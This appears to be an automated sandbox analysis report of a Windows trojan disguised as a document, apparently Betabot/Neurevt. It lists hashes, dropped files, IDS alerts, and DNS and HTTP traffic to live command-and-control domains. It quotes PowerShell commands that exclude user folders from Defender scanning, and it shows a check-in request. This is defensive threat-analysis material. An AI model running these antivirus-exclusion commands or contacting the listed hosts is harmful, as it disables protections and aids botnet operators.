                                        SHA-512:C641B6937D93B76E592F69B35D8E0F8236C985A56BAE41B78FCA29A1B6F16F2C75FB25941D6957A1E761A64D66ACBDF9673CF13434D3CC6F7901904105E19C50
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 47%
                                        Joe Sandbox View:
                                        • Filename: OnZH4ftMLU.exe, Detection: malicious
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....XH`..............0..X...........v... ........@.. ....................................@.................................tv..W....................................u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B.................v......H...........................p............................................(....*..{....*"..}....*J..(........(.....*..0.............s.....+..*..{....*"..}....*6.....(......*.0..L.......s........}.......(.......,..{.......+...., ...o...........s....(...+(......*.0.............s.....+..*....0...............s.....+..*..0............o.....o......s.....+..*".(.....*n.o....-...{....o.......+..*..{....*"..}....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*2....
                                        C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):45056
                                        Entropy (8bit):4.490313118475907
                                        Encrypted:false
                                        SSDEEP:384:3GoUMQDhfWbKwaDwGYSk+RAno78NvcWceLMsT98or1GcB91EITQB4XWW0egcbAcQ:3khVwggo78NcWc8MsT9d1GcfhMJWzBG
                                        MD5:08CDFD0D3A406601C42F087DA16EC6C8
                                        SHA1:48FD8EEF568D2372E2A883283E58E5DEF81FEF07
                                        SHA-256:EB7CEA525ECEF555356C13B6948C21DDAD4B8A622FF4C027F285C0C096570253
                                        SHA-512:D522FC9C5815C93A1DC114C63DB53879346E435397CAD79A105A412CB18459335A1BFC3CFC9E7F6469CD703E2014538AA3C649442B80214A945E76ED50D26940
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 21%
                                        Joe Sandbox View:
                                        • Filename: OnZH4ftMLU.exe, Detection: malicious
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...6...*...5...*..t5...*..Rich.*..................PE..L.....G`..................... ....................@.................................L...........................................(...........................................................................0... ....................................text....w.......................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):47
                                        Entropy (8bit):1.168829563685559
                                        Encrypted:false
                                        SSDEEP:3:/lSll2DQi:AoMi
                                        MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                        SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                        SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                        SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                        Malicious:false
                                        Preview: ........................................user.
                                        C:\Users\user\Documents\20210310\PowerShell_transcript.226533.Y48a1ZGl.20210310114233.txt
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):5694
                                        Entropy (8bit):5.382101394781873
                                        Encrypted:false
                                        SSDEEP:96:BZa//N3qDo1ZyZE//N3qDo1ZfRHZjZS//N3qDo1ZUAJJuZZ:G
                                        MD5:D15CC852AC45668872AB79A544C998CB
                                        SHA1:FB588FE3D6DCA4730F3F6044F019871BE7754080
                                        SHA-256:558350FA83016D5F06947E928ACB9363A3412D84E8E8951963B299F7A8945608
                                        SHA-512:863DBBDC30B91A6BA58A12D1A6F1E2018137DD1E4ED9CC09BD277A3E7E2CA159BE227146C5A6FDCE02C212A87C4A986504DDC093E600F266C9AD43E144283152
                                        Malicious:false
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210310114234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226533 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'..Process ID: 5840..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210310114234..**********************..PS>Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'..**********************..Windows PowerShell transcript start..Start time: 20210310114711..Username: computer\user..RunAs User: computer\user..Configuration
                                        C:\Users\user\Documents\20210310\PowerShell_transcript.226533.gDmd_gCW.20210310114233.txt
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):5742
                                        Entropy (8bit):5.38270272736976
                                        Encrypted:false
                                        SSDEEP:96:BZa//NbqDo1ZOZA//NbqDo1Z27ljjZ5//NbqDo1Z0WzzGZR:s
                                        MD5:E45D0C57145CE350F37E6F9A7793EEE7
                                        SHA1:0629D1060B01922BA18A669645CF02A3BD9E7520
                                        SHA-256:6C44AF999AB007997FC95A830FCE7E5FC25158E35E1D3680D33C8DD372FA9B28
                                        SHA-512:908CD5C99CD584ECC2B69447E5F6FE2DAB155635D8284C5A9B67A1CF2A7BB1052A61FF63653994FD3888C1D96FCFA4F3EAB7E4B9E2F41DF9EC89F8F6B3BB92C7
                                        Malicious:false
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210310114234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226533 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'..Process ID: 4540..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210310114234..**********************..PS>Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'..**********************..Windows PowerShell transcript start..Start time: 20210310114733..Username: computer\user..RunAs User: computer\user..Configur

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):5.888594490665969
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:Documento--SII--33875.exe
                                        File size:852996
                                        MD5:2ced2c14eece71c72c5e45e8a607bb4c
                                        SHA1:13a700a297a7e5697d69bb743c3b256ac10a14e2
                                        SHA256:4efd9a3fa2d25d6706213feb3299dd0f73777aad01217b9e3df046064fdbbb7e
                                        SHA512:199cb38d7f20f64b30d2cb2ba56dab6c0d3b2685d85a990c085060752071b9620d131c5c25bba9b3140c9816ae3515d6b7dbf794d3dd71db15bb8d3f4eb04f06
                                        SSDEEP:24576:vjmBlOdjWsqxOCNsYa/xHXhOCXlt4DOShLQK:n4yWZ
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........]............................r.......................................Rich............................PE..L....BC`...........

                                        File Icon

                                        Icon Hash:74ccc4d0dcdcd0d0

                                        General

                                        Entrypoint:0x429843
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp:0x60434210 [Sat Mar 6 08:49:20 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:04d2817c9af4caf688e2f1cd10fe3c90
                                        Programming Language:
                                        • [RES] VS2003 (.NET) build 3077
                                        • [ASM] VS2003 (.NET) build 3077
                                        • [C++] VS2003 (.NET) build 3077
                                        • [ C ] VS2003 (.NET) build 3077
                                        • [LNK] VS2003 (.NET) build 3077
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9f000 | 0x28 | .idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa0000 | 0x7ac | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7a000 | 0x1c | .rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x9f1f8 | 0x1d0 | .idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .rdaals2 | 0x1000 | 0x270f2 | 0x28000 | False | 0.00110473632813 | data | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .text | 0x29000 | 0x506ed | 0x51000 | False | 0.295253423997 | data | 5.61178432466 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x7a000 | 0x13334 | 0x14000 | False | 0.318933105469 | data | 4.38860465932 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0x8e000 | 0x109bc | 0x3000 | False | 0.149332682292 | data | 1.50156337755 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .idata | 0x9f000 | 0xbc9 | 0x1000 | False | 0.269775390625 | data | 3.80824348363 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xa0000 | 0x7ac | 0x1000 | False | 0.2138671875 | data | 2.10865995397 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country
                                        RT_ICON | 0xa00e8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2291108088, next used block 63371 | |
                                        RT_GROUP_ICON | 0xa03d0 | 0x14 | data | |
                                        RT_VERSION | 0xa03e4 | 0x3c8 | data | English | United States
                                        DLL | Import
                                        KERNEL32.dll | GetLocalTime, HeapAlloc, GetProcessHeap, GetProcAddress, LoadLibraryW, GetModuleHandleA, GetStartupInfoW, GetVersionExA, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, HeapFree, RtlUnwind, IsBadWritePtr, IsBadReadPtr, HeapValidate, GetTimeFormatA, GetDateFormatA, GetCPInfo, TlsAlloc, GetCurrentThreadId, TlsFree, TlsSetValue, TlsGetValue, SetLastError, GetLastError, GetCurrentThread, ExitProcess, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, InitializeCriticalSection, VirtualAlloc, HeapReAlloc, VirtualQuery, InterlockedExchange, DebugBreak, InterlockedDecrement, OutputDebugStringA, LoadLibraryA, InterlockedIncrement, WideCharToMultiByte, GetTimeZoneInformation, VirtualProtect, GetSystemInfo, GetACP, GetOEMCP, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetConsoleCtrlHandler, GetLocaleInfoW, LCMapStringA, LCMapStringW, RaiseException, SetFilePointer, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, FlushFileBuffers, CloseHandle
                                        Description | Data
                                        LegalCopyright | VDOni Helpa Kuo Siatempe
                                        InternalName | Ahma Ob5ml Esk Eml
                                        FileVersion | 58.9.948
                                        CompanyName | FDUs Ikrso Stop Bga
                                        LegalTrademarks | SDo. Tiu. Eksa Ho.
                                        Comments | SygBefgi Erko Bo Ve,
                                        ProductName | ZSubjekto TErade Hdo Ogs
                                        ProductVersion | 58.9.948
                                        FileDescription | EDLarinrgalo. Mern Kune Demandovorto,
                                        OriginalFilename | Ms5io.exe
                                        Translation | 0x0409 0x04b0
                                        Language of compilation system | Country where language is spoken | Map
                                        English | United States |

                                        Network Behavior

                                        Snort IDS Alerts

                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        03/10/21-11:42:24.226293 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.5 | 8.8.8.8
                                        03/10/21-11:42:27.643245 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49715 | 80 | 192.168.2.5 | 212.114.52.43
                                        03/10/21-11:42:29.589484 | TCP | 2021697 | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 49716 | 80 | 192.168.2.5 | 104.21.55.228

                                        Network Port Distribution

                                        • Total Packets: 106
                                        • 443 (HTTPS)
                                        • 80 (HTTP)
                                        • 53 (DNS)
                                        Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                        Mar 10, 2021 11:42:24.226293087 CET | 192.168.2.5 | 8.8.8.8 | d004 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 10, 2021 11:42:23.145108938 CET | 192.168.2.5 | 8.8.8.8 | 0x7b8d | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:24.146101952 CET | 192.168.2.5 | 8.8.8.8 | 0x7b8d | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:27.533092976 CET | 192.168.2.5 | 8.8.8.8 | 0x5713 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:29.447962046 CET | 192.168.2.5 | 8.8.8.8 | 0xe590 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:29.486794949 CET | 192.168.2.5 | 8.8.8.8 | 0x5e74 | Standard query (0) | zakriasons.co | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:33.592852116 CET | 192.168.2.5 | 8.8.8.8 | 0x9043 | Standard query (0) | estrelladamm.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:33.909949064 CET | 192.168.2.5 | 8.8.8.8 | 0x22d4 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:36.868185997 CET | 192.168.2.5 | 8.8.8.8 | 0x868d | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:39.704246998 CET | 192.168.2.5 | 8.8.8.8 | 0x7672 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:42.530456066 CET | 192.168.2.5 | 8.8.8.8 | 0xc16f | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:45.911041975 CET | 192.168.2.5 | 8.8.8.8 | 0xadc8 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:48.731410980 CET | 192.168.2.5 | 8.8.8.8 | 0xf032 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:51.556493998 CET | 192.168.2.5 | 8.8.8.8 | 0x4ead | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:54.447309971 CET | 192.168.2.5 | 8.8.8.8 | 0x1a6d | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:57.311022043 CET | 192.168.2.5 | 8.8.8.8 | 0x3659 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:00.138197899 CET | 192.168.2.5 | 8.8.8.8 | 0x52a6 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:03.027340889 CET | 192.168.2.5 | 8.8.8.8 | 0x1577 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:05.854348898 CET | 192.168.2.5 | 8.8.8.8 | 0x2e82 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:08.675479889 CET | 192.168.2.5 | 8.8.8.8 | 0x810e | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:11.481430054 CET | 192.168.2.5 | 8.8.8.8 | 0xb5c4 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:14.313855886 CET | 192.168.2.5 | 8.8.8.8 | 0xbee4 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:17.140939951 CET | 192.168.2.5 | 8.8.8.8 | 0xf7cb | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:19.973582029 CET | 192.168.2.5 | 8.8.8.8 | 0x2c56 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:23.370452881 CET | 192.168.2.5 | 8.8.8.8 | 0x506b | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:26.230215073 CET | 192.168.2.5 | 8.8.8.8 | 0x5328 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:29.049068928 CET | 192.168.2.5 | 8.8.8.8 | 0x838b | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:31.855731964 CET | 192.168.2.5 | 8.8.8.8 | 0x16c4 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:34.693445921 CET | 192.168.2.5 | 8.8.8.8 | 0x6aa2 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:37.497648001 CET | 192.168.2.5 | 8.8.8.8 | 0xaafd | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:41.002331018 CET | 192.168.2.5 | 8.8.8.8 | 0xea82 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:43.899296999 CET | 192.168.2.5 | 8.8.8.8 | 0x7a5e | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:46.781203985 CET | 192.168.2.5 | 8.8.8.8 | 0x3a3 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:49.630826950 CET | 192.168.2.5 | 8.8.8.8 | 0x5c11 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:52.461114883 CET | 192.168.2.5 | 8.8.8.8 | 0xf2fd | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:55.287610054 CET | 192.168.2.5 | 8.8.8.8 | 0x1897 | Standard query (0) | rusianlover.icu | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 10, 2021 11:42:24.200372934 CET | 8.8.8.8 | 192.168.2.5 | 0x7b8d | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:24.226169109 CET | 8.8.8.8 | 192.168.2.5 | 0x7b8d | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:27.590620995 CET | 8.8.8.8 | 192.168.2.5 | 0x5713 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:29.503112078 CET | 8.8.8.8 | 192.168.2.5 | 0xe590 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:29.548923969 CET | 8.8.8.8 | 192.168.2.5 | 0x5e74 | No error (0) | zakriasons.co |  | 104.21.55.228 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:29.548923969 CET | 8.8.8.8 | 192.168.2.5 | 0x5e74 | No error (0) | zakriasons.co |  | 172.67.173.204 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:33.925044060 CET | 8.8.8.8 | 192.168.2.5 | 0x9043 | No error (0) | estrelladamm.icu |  | 8.210.47.214 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:33.970722914 CET | 8.8.8.8 | 192.168.2.5 | 0x22d4 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:36.922789097 CET | 8.8.8.8 | 192.168.2.5 | 0x868d | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:39.761579037 CET | 8.8.8.8 | 192.168.2.5 | 0x7672 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:42.584700108 CET | 8.8.8.8 | 192.168.2.5 | 0xc16f | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:45.965420008 CET | 8.8.8.8 | 192.168.2.5 | 0xadc8 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:48.790709972 CET | 8.8.8.8 | 192.168.2.5 | 0xf032 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:51.610935926 CET | 8.8.8.8 | 192.168.2.5 | 0x4ead | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:54.506834030 CET | 8.8.8.8 | 192.168.2.5 | 0x1a6d | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:42:57.365310907 CET | 8.8.8.8 | 192.168.2.5 | 0x3659 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:00.195586920 CET | 8.8.8.8 | 192.168.2.5 | 0x52a6 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:03.081782103 CET | 8.8.8.8 | 192.168.2.5 | 0x1577 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:05.908895969 CET | 8.8.8.8 | 192.168.2.5 | 0x2e82 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:08.729815960 CET | 8.8.8.8 | 192.168.2.5 | 0x810e | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:11.548894882 CET | 8.8.8.8 | 192.168.2.5 | 0xb5c4 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:14.368622065 CET | 8.8.8.8 | 192.168.2.5 | 0xbee4 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:17.195389032 CET | 8.8.8.8 | 192.168.2.5 | 0xf7cb | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:20.028006077 CET | 8.8.8.8 | 192.168.2.5 | 0x2c56 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:23.427532911 CET | 8.8.8.8 | 192.168.2.5 | 0x506b | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:26.276403904 CET | 8.8.8.8 | 192.168.2.5 | 0x5328 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:29.094966888 CET | 8.8.8.8 | 192.168.2.5 | 0x838b | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:31.913132906 CET | 8.8.8.8 | 192.168.2.5 | 0x16c4 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:34.739461899 CET | 8.8.8.8 | 192.168.2.5 | 0x6aa2 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:37.547091961 CET | 8.8.8.8 | 192.168.2.5 | 0xaafd | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:41.059139013 CET | 8.8.8.8 | 192.168.2.5 | 0xea82 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:43.956202030 CET | 8.8.8.8 | 192.168.2.5 | 0x7a5e | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:46.827439070 CET | 8.8.8.8 | 192.168.2.5 | 0x3a3 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:49.679625988 CET | 8.8.8.8 | 192.168.2.5 | 0x5c11 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:52.507015944 CET | 8.8.8.8 | 192.168.2.5 | 0xf2fd | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
Mar 10, 2021 11:43:55.333604097 CET | 8.8.8.8 | 192.168.2.5 | 0x1897 | No error (0) | rusianlover.icu |  | 212.114.52.43 | A (IP address) | IN (0x0001)
                                        • rusianlover.icu
                                        • zakriasons.co
                                        • estrelladamm.icu
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49715 | 212.114.52.43 | 80 | C:\Windows\SysWOW64\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 10, 2021 11:42:27.643244982 CET | 1160 | OUT | POST /forum/logout.php?page=7 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 1081
                                        Cache-Control: no-cache
Mar 10, 2021 11:42:27.732872963 CET | 1162 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
